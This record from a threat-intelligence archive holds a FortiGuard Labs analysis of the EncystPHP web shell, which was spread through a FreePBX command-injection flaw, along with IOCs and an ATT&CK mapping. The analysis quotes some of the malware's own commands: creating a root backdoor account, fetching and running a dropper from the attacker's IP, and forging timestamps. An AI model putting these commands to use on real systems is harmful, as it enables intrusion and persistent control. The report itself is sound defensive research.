{
	"id": "bdc1c4fe-3fec-4d6f-a40f-bd0ef6311bef",
	"created_at": "2026-04-06T00:09:59.776605Z",
	"updated_at": "2026-04-10T03:28:44.665428Z",
	"deleted_at": null,
	"sha1_hash": "813f7820008c206bdcbaf4af6559ac0f0be9239b",
	"title": "Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1773181,
	"plain_text": "Unveiling the Weaponized Web Shell EncystPHP | FortiGuard\r\nLabs\r\nBy Vincent Li\r\nPublished: 2026-01-28 · Archived: 2026-04-02 10:46:39 UTC\r\nAffected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3\r\nImpacted Users: Any organization\r\nImpact: Remote attackers gain control of the vulnerable systems\r\nSeverity Level: High\r\nFortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities,\r\nincluding remote command execution, persistence mechanisms, and web shell deployment. Incidents were\r\nlaunched in early December last year and propagated via exploitation of the FreePBX vulnerability CVE-2025-\r\n64328.\r\nIts malicious activity appears to be associated with the hacker group INJ3CTOR3, first identified in 2020, which\r\ntargeted CVE-2019-19006. In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461.\r\nThese incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web\r\nshell in the target environments. We assess that this campaign represents recent attack activity and behavior\r\npatterns associated with INJ3CTOR3.\r\nThe following section provides an in-depth analysis of the related incidents and the EncystPHP web shell.\r\nIncidents\r\nThe web shell was delivered via CVE-2025-64328, a post-authentication command-injection vulnerability in the\r\nadministrative interface of the FreePBX Endpoint Manager.\r\nThe exploit originated from Brazil and targeted a victim environment managed by an Indian technology company\r\nspecializing in cloud solutions, communication services, and IT infrastructure.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 1 of 16\n\nFigure 1: FreePBX administrative interface\r\nThe attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202, which resolves to\r\nthe domain crm[.]razatelefonia[.]pro. The associated web page, Raza Telefonia, which appears to be a VoIP\r\nmanagement system, includes a login interface.\r\nFigure 2: EncystPHP attack traffic via CVE-2025-64328\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 2 of 16\n\nFigure 3: Malware download website\r\nWhen connected to the route new/ on the download source, the request is automatically redirected to another\r\ndropper named k.php.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 3 of 16\n\nFigure 4: Malware download source redirects to the EncystPHP dropper\r\nMalware Analysis\r\nEncystPHP was initially delivered by exploiting the FreePBX vulnerability CVE-2025-64328. It deployed a web\r\nshell on victim hosts via the file named  \"c\", which serves as the starting point for the following analysis.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 4 of 16\n\nFigure 5: The EncystPHP file flow\r\nThe dropper first modifies the file permissions of ajax.php and model.php to 000, rendering both files\r\nunreadable, unwritable, and non-executable.\r\nFigure 6: Modifying file permission to 000\r\nEncystPHP then attempts to collect database configuration information from /etc/freepbx.conf and proceeds to\r\ndelete cron job entries and multiple FreePBX user accounts, including “ampuser,” “svc_freepbx,” “freepbx_svc,”\r\n“bluej,” “nahda,” “FreePBX_setup,” “emoadmin,” and “nvd0rz.”\r\nFigure 7: Collecting database configurations and deleting commands and users\r\nIt then searches for PHP files associated with web shells by identifying content such as Base64 decode functions,\r\npacket headers, or PHP functions that execute shell commands, and deletes all matching files.\r\nFigure 8: Deleting other PHP web shells\r\nEncystPHP also scans for PHP files containing strings such as “Badr,” “b3d0r,” “pastebin,” “yokyok,” or\r\n“bm2cjjnRXac1WW3KT7k6MKTR,” and removes these files. These may be related to older versions of the web\r\nshell itself or other malicious PHP files.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 5 of 16\n\nFigure 9: Deleting PHP files with specific strings\r\nTo facilitate persistent control over the compromised host, the malware creates a root-level user named newfpbx,\r\nresets multiple user account passwords to a single value, and escalates their privileges.\r\nuseradd -s /bin/bash  -ou 0 -g 0 -p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx \u0026\u003e/dev/null\r\nFigure 10: Modifying system user with the same password\r\nFollow this behavior, EncystPHP injects the SSH public key and modifies system configurations to ensure that\r\nthe default SSH port (22) remains open.\r\nFigure 11: Injecting the SSH public key\r\nFigure 12: Ensuring SSH is always open\r\nIt then downloads an additional dropper to support further web shell deployment and persistence.\r\n(setsid wget \"hxxp://45[.]234[.]176[.]202/new/k.php\" -O /var/spool/asterisk/tmp/serv 2\u003e/dev/null \u003e/dev/null; bash\r\n/var/spool/asterisk/tmp/serv 2\u003e/dev/null \u003e /dev/null \u0026 ) 2\u003e\u00261\r\nFigure 13: Downloading another dropper with Base64-encoded command\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 6 of 16\n\nAt the final stage of the c dropper execution, EncystPHP tampers with log files and deletes the FreePBX\r\nEndpoint Manager module named endpoint. After completing these actions, it restores file permissions on\r\nFreePBX-related files and reloads the configuration to avoid a service exception.\r\nFigure 14: Erasing traces and removing the endpoint\r\nThe c dropper then deploys a Base64-encoded web shell and downloads another dropper, named k.php. The\r\nk.php dropper performs similar actions, including deploying a Base64-encoded web shell, installing configuration\r\ncomponents, and establishing persistence mechanisms.\r\nWeb Shell\r\nThe payload is delivered in Base64-encoded format and decoded at runtime by the dropper component. The\r\ndecoded PHP web shell is written to disk, masquerading as a legitimate FreePBX file named ajax.php, allowing it\r\nto blend into the application structure.\r\nFigure 15: Base64-encoded web shell\r\nAuthentication is performed using a simple verification mechanism in which a plaintext password entered via the\r\nweb interface is hashed with MD5 and compared against a hard-coded hash value embedded in the web shell.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 7 of 16\n\nFigure 16: Web shell authentication verification interface source code\r\nFigure 17: Web shell authentication verification interface\r\nFigure 18: Verifying hard-coded MD5 credentials\r\nUpon successful authentication, the web shell exposes an interactive interface titled Ask Master. This interface\r\nincludes multiple predefined operational commands, such as file system enumeration, process inspection,\r\nquerying active Asterisk channels, listing Asterisk SIP peers, and retrieving multiple FreePBX and Elastix\r\nconfiguration files.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 8 of 16\n\nFigure 19: Web shell interface source code\r\nFigure 20: Web shell interface\r\nBy leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges,\r\nenabling arbitrary command execution on the compromised host and initiating outbound call activity through the\r\nPBX environment.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 9 of 16\n\nFigure 21: Elastix and FreePBX privilege escalation\r\nDropper\r\nThe file k.php also contains the previously mentioned Base64-encoded web shell. Once executed, it decodes the\r\npayload and writes it to disk as ajax.php, deploying it to multiple locations.\r\nFigure 22: Web shell deployment\r\nThe dropper creates several directories under the path /var/www/html/, including digium_phones/, rest_phones/,\r\ndigium_phoness/, phones/, fpbxphones/, freepbxphones/, and freepbx/.\r\nIt then copies the web shell EncystPHP from /var/www/html/admin/views/ajax.php and\r\n/var/www/html/rest_phones/ajax.php to the file paths listed in the following table. These paths correspond to\r\ncommonly accessible web routes, increasing resilience by ensuring that alternative access points remain available\r\nif one instance is removed.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 10 of 16\n\n/var/www/html/rest_phones/ajax.php\r\n/var/www/html/admin/modules/core/ajax.php\r\n/var/www/html/digium_phones/ajax.php\r\n/var/www/html/admin/assets/js/config.php\r\n/var/www/html/admin/assets/config.php\r\n/var/www/html/admin/assets/ajax.php\r\n/var/www/html/admin/modules/core/ajax.php\r\n/var/www/html/phones/ajax.php\r\n/var/www/html/digium_phoness/ajax.php\r\n/var/www/html/fpbxphones/ajax.php\r\n/var/www/html/freepbxphones/ajax.php\r\n/var/www/html/freepbx/ajax.php\r\nAfter deploying the web shell, the dropper forges timestamps to match those of legitimate files, reducing the\r\nlikelihood of detection during routine inspection.\r\ntouch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php\r\nNext, the malware decodes a Base64-encoded configuration file and writes it to\r\n/var/www/html/admin/views/.htaccess. This configuration enables RewriteCond and RewriteRule directives for\r\nURL redirection. The rules first verify that the requested resource is neither a directory, a file, nor a symbolic link.\r\nThe final rule specifies that requests beginning with one or more whitespace characters are redirected to\r\nconfig.php.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 11 of 16\n\nFigure 23: Configuration of EncystPHP\r\nFinally, the dropper decodes and writes the Base64-encoded shell script to /var/spool/asterisk/tmp/test.sh and\r\n/tmp/test.sh. The script is executed using bash, after which the attack removes the script to eliminate forensic\r\nartifacts.\r\nFigure 24: Base64-encoded persistence shell script\r\nPersistence\r\nThe persistence mechanism implemented by EncystPHP consists of four parts. The first establishes persistence\r\nbefore executing test.sh. In this stage, the dropper c installs multiple crontab entries that download the secondary\r\ndropper k.php every minute, saving it as /var/lib/asterisk/bin/zen2 and /var/lib/asterisk/bin/devnull2.\r\nFigure 25: Initial persistence method in the dropper c\r\nNext, test.sh triggers the second and third persistence stages. It decodes a Base64-encoded file named license.php\r\nand writes it to /var/www/html/admin/modules/freepbx_ha/. This file subsequently downloads two droppers, c and\r\nk.php, and installs additional crontab entries.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 12 of 16\n\nFigure 26: Persistence shell script “test.sh”\r\nThe third stage periodically downloads the dropper k.php and saves it as /var/lib/asterisk/bin/devnull every three\r\nminutes. It then echoes the rm command three times without executing it, creating the appearance that\r\nEncystPHP has been removed from the system.\r\nFigure 27: Cron tab command in \"test.sh\"\r\nThe fourth persistence stage is executed via license.php. It downloads the dropper k.php as\r\n/var/lib/asterisk/bin/devnull2, and the dropper c as /var/lib/asterisk/bin/devnull23 and /trmp/devnull24 at one-minute intervals. In addition to maintaining persistence, this stage disables error reporting, executes EncystPHP,\r\nand removes log artifacts to hinder detection.\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 13 of 16\n\nFigure 28: Persistence PHP file license.php\r\nConclusion\r\nThis incident demonstrates how CVE-2025-64328 can be exploited to deploy stealthy, persistent web shells, such\r\nas EncystPHP, in FreePBX environments, underscoring that unpatched PBX systems remain high-value targets.\r\nAlthough the attack techniques are not entirely new, the observed behavior reflects an active and ongoing threat\r\nthat closely mirrors historical INJ3CTOR3 campaigns while adapting to current operational contexts.\r\nBecause it can blend into legitimate FreePBX and Elastix components, such activity may evade immediate\r\ndetection, leaving affected systems exposed to well-known risks, including long-term persistence, unauthorized\r\nadministrative access, and abuse of telephony resources. Organizations should treat any successful exploitation of\r\nthis vulnerability as a full compromise and prioritize immediate remediation, monitoring, and security hardening\r\nto mitigate further impact.\r\nFortinet Protections\r\nThe malware described in this report is detected and blocked by FortiGuard Antivirus as:\r\nPHP/EncystPHP.A!tr\r\nBASH/EncystPHP.A!tr\r\nThe FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR.\r\nCustomers running these products with up-to-date signatures are protected against the malware components\r\ndescribed in this report.\r\nThe FortiGuard Web Filtering Service blocks the C2 server.\r\nFortiGuard Labs provides an IPS signature against attacks exploiting the following vulnerabilities:\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 14 of 16\n\nCVE-2025-64328: 59448 FreePBX.Administration.GUI.filestore.Command.Injection\r\nOrganizations seeking to strengthen foundational security awareness may also consider completing Fortinet\r\nCertified Fundamentals (FCF) training in Cybersecurity.  This module is designed to help end users learn how to\r\nidentify and protect themselves from phishing attacks.\r\nThe FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with\r\nthis campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT\r\ncollaborations, MITRE, trusted industry partners, and other intelligence sources.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, contact our Global\r\nFortiGuard Incident Response Team for assistance.\r\nIOCs\r\nURLs\r\nhxxp://45[.]234[.]176[.]202/new/c\r\nhxxp://45[.]234[.]176[.]202/new/k.php\r\nHosts\r\n45[.]234[.]176[.]202\r\n187[.]108[.]1[.]130\r\nFiles\r\n71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302\r\n7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574\r\nfc514c45fa8e3a49f003eae4e0c8b6a523409b8341503b529c85ffe396bb74f2\r\n285fac34a5ffdac7cb047d412862e1ca5e091e70c0ac0383b71159fdd0d20bb2\r\n29d74963f99563e711e5db39261df759f76da6893f3ca71a4704b9ee2b26b8c7\r\nMITRE ATT\u0026CK Mapping for EncystPHP Campaign\r\nTactic\r\nTechnique\r\nID\r\nTechnique Name Observed Activity in EncystPHP\r\nInitial Access T1190\r\nExploit Public-Facing\r\nApplication\r\nExploitation of FreePBX Endpoint Manager\r\nvia CVE-2025-64328 to execute post-authentication command injection\r\nExecution T1059.004\r\nCommand and Scripting\r\nInterpreter: Unix Shell\r\nExecution of Bash commands via injected\r\npayloads and downloaded shell scripts\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 15 of 16\n\nPersistence T1053.003\r\nScheduled Task/Job:\r\nCron\r\nMultiple crontab entries installed to\r\nrepeatedly download and execute droppers\r\nPersistence T1505.003\r\nServer Software\r\nComponent: Web Shell\r\nDeployment of EncystPHP masquerading as\r\nlegitimate FreePBX PHP files (ajax.php,\r\nconfig.php)\r\nPrivilege\r\nEscalation\r\nT1068\r\nExploitation for Privilege\r\nEscalation\r\nAbuse of FreePBX administrative context to\r\nexecute commands with elevated privileges\r\nPrivilege\r\nEscalation\r\nT1136.001\r\nCreate Account: Local\r\nAccount\r\nCreation of a root-level user account\r\n(newfpbx) with UID 0\r\nCredential\r\nAccess\r\nT1003 OS Credential Dumping\r\nCollection of database credentials from\r\n/etc/freepbx.conf\r\nDefense\r\nEvasion\r\nT1070.004\r\nIndicator Removal on\r\nHost: File Deletion\r\nDeletion of logs, cron artifacts, and FreePBX\r\nEndpoint Manager module\r\nDefense\r\nEvasion\r\nT1222.002\r\nFile and Directory\r\nPermissions\r\nModification: Linux\r\nModification of file permissions to 000 to\r\nblock access and disrupt inspection\r\nDefense\r\nEvasion\r\nT1036.005\r\nMasquerading: Match\r\nLegitimate Name or\r\nLocation\r\nWeb shell written to legitimate FreePBX file\r\npaths with forged timestamps\r\nDefense\r\nEvasion\r\nT1562.001\r\nImpair Defenses: Disable\r\nor Modify Tools\r\nRemoval of competing web shells and\r\ndisabling error reporting\r\nLateral\r\nMovement\r\nT1021.004 Remote Services: SSH\r\nInjection of attacker-controlled SSH public\r\nkey and forced exposure of port 22\r\nCommand\r\nand Control\r\nT1105 Ingress Tool Transfer\r\nRepeated download of droppers (c, k.php)\r\nfrom attacker-controlled infrastructure\r\nCommand\r\nand Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nUse of HTTP for payload delivery and\r\ncommand execution\r\nImpact T1496 Resource Hijacking\r\nAbuse of PBX resources for unauthorized\r\ntelephony operations\r\nSource: https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nhttps://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp"
	],
	"report_names": [
		"unveiling-the-weaponized-web-shell-encystphp"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "07d5d8cf-7a15-47de-a1b7-a3333f064290",
			"created_at": "2026-02-07T02:00:03.660294Z",
			"updated_at": "2026-04-10T02:00:03.959064Z",
			"deleted_at": null,
			"main_name": "INJ3CTOR3",
			"aliases": [],
			"source_name": "MISPGALAXY:INJ3CTOR3",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434199,
	"ts_updated_at": 1775791724,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/813f7820008c206bdcbaf4af6559ac0f0be9239b.pdf",
		"text": "https://archive.orkl.eu/813f7820008c206bdcbaf4af6559ac0f0be9239b.txt",
		"img": "https://archive.orkl.eu/813f7820008c206bdcbaf4af6559ac0f0be9239b.jpg"
	}
}